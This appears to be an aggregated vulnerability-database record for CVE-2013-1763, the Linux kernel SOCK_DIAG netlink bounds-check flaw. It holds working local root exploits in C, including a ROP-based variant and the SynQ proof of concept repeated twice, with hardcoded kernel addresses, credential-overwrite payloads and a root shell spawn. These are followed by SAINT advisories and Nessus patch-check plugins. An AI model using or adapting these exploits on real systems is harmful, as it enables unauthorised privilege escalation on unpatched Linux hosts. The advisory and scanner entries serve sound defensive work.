{\n\tif(!getuid())\n\t\tsystem(\"/bin/sh\");\n\n\texit(0);\n}\n\nstatic void restore() {\n\tasm volatile(\n\t\"swapgs ;\"\n\t\"movq %0, 0x20(%%rsp)\\t\\n\"\n\t\"movq %1, 0x18(%%rsp)\\t\\n\"\n\t\"movq %2, 0x10(%%rsp)\\t\\n\"\n\t\"movq %3, 0x08(%%rsp)\\t\\n\"\n\t\"movq %4, 0x00(%%rsp)\\t\\n\"\n\t\"iretq\"\n\t: : \"r\" (user_ss),\n\t \"r\" ((unsigned long)0x36000000),\n\t \"r\" (user_rflags),\n\t \"r\" (user_cs),\n\t \"r\" (shell)\n\t);\n}\n\nint __attribute__((regparm(3)))\nkernel_code()\n{\n\tcommit_creds(prepare_kernel_cred(0));\n\trestore();\n\t\n\treturn -1;\n}\n\nint main(int argc, char*argv[])\n{\n\tint fd;\n\n\tstruct sock_diag_handler {\n\t\t__u8 family;\n\t\tint (*dump)(void *a, void *b);\n\t};\n\n\tunsigned family;\n\tstruct {\n\t\tstruct nlmsghdr nlh;\n\t\tstruct unix_diag_req r;\n\t} req;\n\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\n\t\tprintf(\"Can't create sock diag socket\\n\");\n\t\treturn -1;\n\t}\n\n\tvoid *mapped;\n\tvoid *fakestruct;\n\tstruct sock_diag_handler a;\n\ta.dump = (void *)0xffffffff8100b74f;\n\n\tcommit_creds = (_commit_creds) 0xffffffff8107ee30;\n\tprepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;\n\n\tassert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000);\n\tmemcpy(fakestruct+0xad38, &a, sizeof(a));\n\n\tassert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000);\n\n\tunsigned long *fakestack = (unsigned long *)mapped;\n\t*fakestack ++= 0xffffffff01661ef4;\n\tint p;\n\tfor (p = 0; p < 0x1000000; p++)\n\t\t*fakestack ++= 0xffffffff8100ad9eUL;\n\t\n\tfakestack = (unsigned long *)(mapped + 0x7000000);\n\tprintf(\"[+] fake stack addr = %lx\\n\", (long unsigned)fakestack);\n\t*fakestack ++= 0xffffffff8133dc8fUL;\n\t*fakestack ++= 0x407e0;\n\t*fakestack ++= 0xffffffff810032edUL;\n\t*fakestack ++= 
0xdeadbeef;\n\t*fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode\n\n\tmemset(&req, 0, sizeof(req));\n\treq.nlh.nlmsg_len = sizeof(req);\n\treq.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\n\treq.nlh.nlmsg_seq = 123456;\n\n\treq.r.sdiag_family = 45;\n\n\treq.r.udiag_states = -1;\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\n\n\tsaveme();\n\tif ( send(fd, &req, sizeof(req), 0) < 0) {\n\t\tprintf(\"bad send\\n\");\n\t\tclose(fd);\n\t\treturn -1;\n\t}\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.3 3.8 (Ubuntu Fedora 18) - sock_diag_handlers() Local Privilege Escalation (3)", "edition": 1, "published": "2013-02-24T00:00:00", "title": "Linux Kernel 3.3 3.8 (Ubuntu Fedora 18) - sock_diag_handlers() Local Privilege Escalation (3)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-02-24T00:00:00", "id": "EXPLOITPACK:5F70F8E747822C4EE26CF99F2739F154", "href": "", "sourceData": "/* \n* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8\n* bug found by Spender\n* poc by SynQ\n* \n* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux\n* using nl_table->hash.rehash_time, index 81\n* \n* Fedora 18 support added\n* \n* 2/2013\n*/\n\n#include <unistd.h>\n#include <sys/socket.h>\n#include <linux/netlink.h>\n#include <netinet/tcp.h>\n#include <errno.h>\n#include <linux/if.h>\n#include <linux/filter.h>\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <linux/sock_diag.h>\n#include <linux/inet_diag.h>\n#include <linux/unix_diag.h>\n#include <sys/mman.h>\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long 
cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\nunsigned long sock_diag_handlers, nl_table;\n\nint __attribute__((regparm(3)))\nkernel_code()\n{\n\tcommit_creds(prepare_kernel_cred(0));\n\treturn -1;\n}\n\nint jump_payload_not_used(void *skb, void *nlh)\n{\n\tasm volatile (\n\t\t\"mov $kernel_code, %eax\\n\"\n\t\t\"call *%eax\\n\"\n\t);\n}\n\nunsigned long\nget_symbol(char *name)\n{\n\tFILE *f;\n\tunsigned long addr;\n\tchar dummy, sym[512];\n\tint ret = 0;\n \n\tf = fopen(\"/proc/kallsyms\", \"r\");\n\tif (!f) {\n\t\treturn 0;\n\t}\n \n\twhile (ret != EOF) {\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **) &addr, &dummy, sym);\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sym);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sym)) {\n\t\t\tprintf(\"[+] resolved symbol %s to %p\\n\", name, (void *) addr);\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\tfclose(f);\n \n\treturn 0;\n}\n\nint main(int argc, char*argv[])\n{\n\tint fd;\n\tunsigned family;\n\tstruct {\n\t\tstruct nlmsghdr nlh;\n\t\tstruct unix_diag_req r;\n\t} req;\n\tchar\tbuf[8192];\n\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\n\t\tprintf(\"Can't create sock diag socket\\n\");\n\t\treturn -1;\n\t}\n\n\tmemset(&req, 0, sizeof(req));\n\treq.nlh.nlmsg_len = sizeof(req);\n\treq.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\n\treq.nlh.nlmsg_seq = 123456;\n\n\t//req.r.sdiag_family = 89;\n\treq.r.udiag_states = -1;\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\n\n\tif(argc==1){\n\t\tprintf(\"Run: %s Fedora|Ubuntu\\n\",argv[0]);\n\t\treturn 0;\n\t}\n\telse if(strcmp(argv[1],\"Fedora\")==0){\n\t commit_creds = (_commit_creds) get_symbol(\"commit_creds\");\n\t prepare_kernel_cred = (_prepare_kernel_cred) get_symbol(\"prepare_kernel_cred\");\n\t sock_diag_handlers = get_symbol(\"sock_diag_handlers\");\n\t nl_table = get_symbol(\"nl_table\");\n\t \n\t 
if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){\n\t\tprintf(\"some symbols are not available!\\n\");\n\t\texit(1);\n\t\t}\n\n\t family = (nl_table - sock_diag_handlers) / 4;\n\t printf(\"family=%d\\n\",family);\n\t req.r.sdiag_family = family;\n\t \n\t if(family>255){\n\t\tprintf(\"nl_table is too far!\\n\");\n\t\texit(1);\n\t\t}\n\t}\n\telse if(strcmp(argv[1],\"Ubuntu\")==0){\n\t commit_creds = (_commit_creds) 0xc106bc60;\n\t prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;\n\t req.r.sdiag_family = 81;\n\t}\n\n\tunsigned long mmap_start, mmap_size;\n\tmmap_start = 0x10000;\n\tmmap_size = 0x120000;\n\tprintf(\"mmapping at 0x%lx, size = 0x%lx\\n\", mmap_start, mmap_size);\n\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\n MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\n printf(\"mmap fault\\n\");\n exit(1);\n }\n\tmemset((void*)mmap_start, 0x90, mmap_size);\n\n\tchar jump[] = \"\\x55\\x89\\xe5\\xb8\\x11\\x11\\x11\\x11\\xff\\xd0\\x5d\\xc3\"; // jump_payload in asm\n\tunsigned long *asd = &jump[4];\n\t*asd = (unsigned long)kernel_code;\n\n\tmemcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));\n\n\tif ( send(fd, &req, sizeof(req), 0) < 0) {\n\t\tprintf(\"bad send\\n\");\n\t\tclose(fd);\n\t\treturn -1;\n\t}\n\n\tprintf(\"uid=%d, euid=%d\\n\",getuid(), geteuid() );\n\n\tif(!getuid())\n\t\tsystem(\"/bin/sh\");\n\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "description": "Added: 05/13/2014 \nCVE: [CVE-2013-1763](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763>) \nBID: [58137](<http://www.securityfocus.com/bid/58137>) \nOSVDB: [90604](<http://www.osvdb.org/90604>) \n\n\n### Background\n\nNetlink is a feature of the Linux kernel which allows communication between kernel and user space. 
\n\n### Problem\n\nAn array index error in the `__sock_diag_rcv_msg` function in the Linux kernel allows local users to gain root privileges by sending a Netlink message with a large family value. \n\n### Resolution\n\nUpgrade to Linux kernel 3.7.10 or higher or install the appropriate package update from the operating system vendor. \n\n### References\n\n<http://seclists.org/oss-sec/2013/q1/420> \n<https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.7.10> \n\n\n### Limitations\n\nExploit works on Ubuntu or Fedora and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "edition": 1, "modified": "2014-05-13T00:00:00", "published": "2014-05-13T00:00:00", "id": "SAINT:18A030A4FCD5D3FC247DC77100CC35FB", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_sock_diag", "type": "saint", "title": "Linux kernel __sock_diag_rcv_msg Netlink message privilege elevation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "description": "Added: 05/13/2014 \nCVE: [CVE-2013-1763](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763>) \nBID: [58137](<http://www.securityfocus.com/bid/58137>) \nOSVDB: [90604](<http://www.osvdb.org/90604>) \n\n\n### Background\n\nNetlink is a feature of the Linux kernel which allows communication between kernel and user space. \n\n### Problem\n\nAn array index error in the `__sock_diag_rcv_msg` function in the Linux kernel allows local users to gain root privileges by sending a Netlink message with a large family value. \n\n### Resolution\n\nUpgrade to Linux kernel 3.7.10 or higher or install the appropriate package update from the operating system vendor. 
\n\n### References\n\n<http://seclists.org/oss-sec/2013/q1/420> \n<https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.7.10> \n\n\n### Limitations\n\nExploit works on Ubuntu or Fedora and requires an existing unprivileged shell connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2014-05-13T00:00:00", "published": "2014-05-13T00:00:00", "id": "SAINT:2FD3877414CB9609C42A165E6BCB9C92", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_sock_diag", "title": "Linux kernel __sock_diag_rcv_msg Netlink message privilege elevation", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:23", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "edition": 2, "description": "Added: 05/13/2014 \nCVE: [CVE-2013-1763](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1763>) \nBID: [58137](<http://www.securityfocus.com/bid/58137>) \nOSVDB: [90604](<http://www.osvdb.org/90604>) \n\n\n### Background\n\nNetlink is a feature of the Linux kernel which allows communication between kernel and user space. \n\n### Problem\n\nAn array index error in the `__sock_diag_rcv_msg` function in the Linux kernel allows local users to gain root privileges by sending a Netlink message with a large family value. \n\n### Resolution\n\nUpgrade to Linux kernel 3.7.10 or higher or install the appropriate package update from the operating system vendor. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2014-05-13T00:00:00", "published": "2014-05-13T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_sock_diag", "id": "SAINT:339ABC340D52FAD12C4D62B93D85D32F", "type": "saint", "title": "Linux kernel __sock_diag_rcv_msg Netlink message privilege elevation", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T13:48:49", "description": "<p>Affected versions: Linux Kernel 3.3-3.8<br></p><p>CVE-ID: CVE-2013-1763</p><p>When the Linux kernel processes the netlink protocol, an out-of-bounds memory access occurs; successful exploitation allows arbitrary code execution and local privilege escalation. The vulnerable code is as follows:</p><p>static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)</p><p>{</p><p> int err;</p><p> struct sock_diag_req *req = NLMSG_DATA(nlh);</p><p> struct sock_diag_handler *hndl;</p><p> if (nlmsg_len(nlh) < sizeof(*req))</p><p> return -EINVAL;</p><p> <b>hndl = sock_diag_lock_handler(req->sdiag_family); </b></p><p> sock_diag_handlers[reg->sdiag_family].</p><p> if (hndl == NULL)</p><p> err = -ENOENT;</p><p> else</p><p> err = hndl->dump(skb, nlh); </p><p> sock_diag_unlock_handler(hndl);</p><p> return err;</p><p>}</p><p>The sock_diag_lock_handler array has no upper-bound check, so crafted parameters can control the hndl pointer.<br></p>", "published": "2014-07-01T00:00:00", "title": "Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86561", "id": "SSV:86561", "sourceData": "\n /* \r\n* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8\r\n* bug found by Spender\r\n* poc by 
SynQ\r\n* \r\n* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux\r\n* using nl_table->hash.rehash_time, index 81\r\n* \r\n* Fedora 18 support added\r\n* \r\n* 2/2013\r\n*/\r\n\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n\r\nint __attribute__((regparm(3))) kernel_code()\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n\r\nint main(int argc, char*argv[])\r\n{\r\n int fd;\r\n unsigned family;\r\n struct {\r\n struct nlmsghdr nlh;\r\n struct unix_diag_req r;\r\n } req;\r\n char buf[8192];\r\n\r\n if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n printf(\"Can't create sock diag socket\\n\");\r\n return -1;\r\n }\r\n\r\n memset(&req, 0, sizeof(req));\r\n req.nlh.nlmsg_len = sizeof(req);\r\n req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n req.nlh.nlmsg_seq = 123456;\r\n\r\n req.r.udiag_states = -1;\r\n req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n\r\n\r\n commit_creds = (_commit_creds) 0xc106bc60;\r\n prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;\r\n req.r.sdiag_family = 81;\r\n\r\n unsigned long mmap_start, mmap_size;\r\n mmap_start = 0x10000;\r\n mmap_size = 0x120000;\r\n printf(\"mmapping at 0x%lx, size = 0x%lx\\n\", mmap_start, mmap_size);\r\n\r\n 
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n printf(\"mmap fault\\n\");\r\n exit(1);\r\n }\r\n memset((void*)mmap_start, 0x90, mmap_size);\r\n\r\n char jump[] = \"\\x55\\x89\\xe5\\xb8\\x11\\x11\\x11\\x11\\xff\\xd0\\x5d\\xc3\";\r\n unsigned long *asd = &jump[4];\r\n *asd = (unsigned long)kernel_code;\r\n\r\n memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));\r\n\r\n if ( send(fd, &req, sizeof(req), 0) < 0) {\r\n printf(\"bad send\\n\");\r\n close(fd);\r\n return -1;\r\n }\r\n\r\n printf(\"uid=%d, euid=%d\\n\",getuid(), geteuid() );\r\n\r\n if(!getuid())\r\n system(\"/bin/sh\");\r\n}\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86561"}], "nessus": [{"lastseen": "2021-01-01T06:39:17", "description": "Mathias Krause discovered a bounds checking error for netlink\nmessages requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user\ncould exploit this flaw to crash the system or run programs as an\nadministrator.", "edition": 22, "published": "2013-02-27T00:00:00", "title": "USN-1751-1 : linux-ti-omap4 vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux"], "id": "UBUNTU_USN-1751-1.NASL", "href": "https://www.tenable.com/plugins/nessus/64911", "sourceData": "# This script was automatically generated from Ubuntu Security\n# Notice USN-1751-1. 
It is released under the Nessus Script \n# Licence.\n#\n# Ubuntu Security Notices are (C) Canonical, Inc.\n# See http://www.ubuntu.com/usn/\n# Ubuntu(R) is a registered trademark of Canonical, Inc.\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64911);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/01/09 14:34:06 $\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_xref(name:\"USN\", value:\"1751-1\");\n\n script_name(english:\"USN-1751-1 : linux-ti-omap4 vulnerability\");\n script_summary(english:\"Checks dpkg output for updated package(s)\");\n\n script_set_attribute(attribute:\"synopsis\", value: \n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"Mathias Krause discovered a bounds checking error for netlink\nmessages requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user\ncould exploit this flaw to crash the system or run programs as an\nadministrator.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/usn-1751-1/\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/27\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security 
Checks\");\n\n script_copyright(\"Ubuntu Security Notice (C) 2013 Canonical, Inc. / NASL script (C) 2013-2015 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"ubuntu.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/Ubuntu/release\")) exit(0, \"The host is not running Ubuntu.\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) exit(1, \"Could not obtain the list of installed packages.\");\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-220-omap4\", pkgver:\"3.5.0-220.29\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:ubuntu_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:17", "description": "Mathias Krause discovered a bounds checking error for netlink messages\nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could\nexploit this flaw to crash the system or run programs as an\nadministrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-02-27T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-1749-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1749-1.NASL", "href": "https://www.tenable.com/plugins/nessus/64909", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1749-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64909);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_bugtraq_id(58137);\n script_xref(name:\"USN\", value:\"1749-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-quantal vulnerability (USN-1749-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mathias Krause discovered a bounds checking error for netlink messages\nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could\nexploit this flaw to crash the system or run programs as an\nadministrator.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1749-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.5-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-1763\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1749-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.5.0-25-generic\", pkgver:\"3.5.0-25.39~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:11:44", "description": "This update contains a fix for the netlink out-of-bounds access issue\nwhich could allow a local user to gain privileged access. All users\nare encouraged to update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2013-03-04T00:00:00", "title": "Fedora 17 : kernel-3.7.9-104.fc17 (2013-3106)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1763"], "modified": "2013-03-04T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2013-3106.NASL", "href": "https://www.tenable.com/plugins/nessus/64985", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-3106.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64985);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1763\");\n script_bugtraq_id(58137);\n script_xref(name:\"FEDORA\", value:\"2013-3106\");\n\n script_name(english:\"Fedora 17 : kernel-3.7.9-104.fc17 (2013-3106)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a fix for the netlink out-of-bounds access issue\nwhich could allow a local user to gain privileged access. All users\nare encouraged to update.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
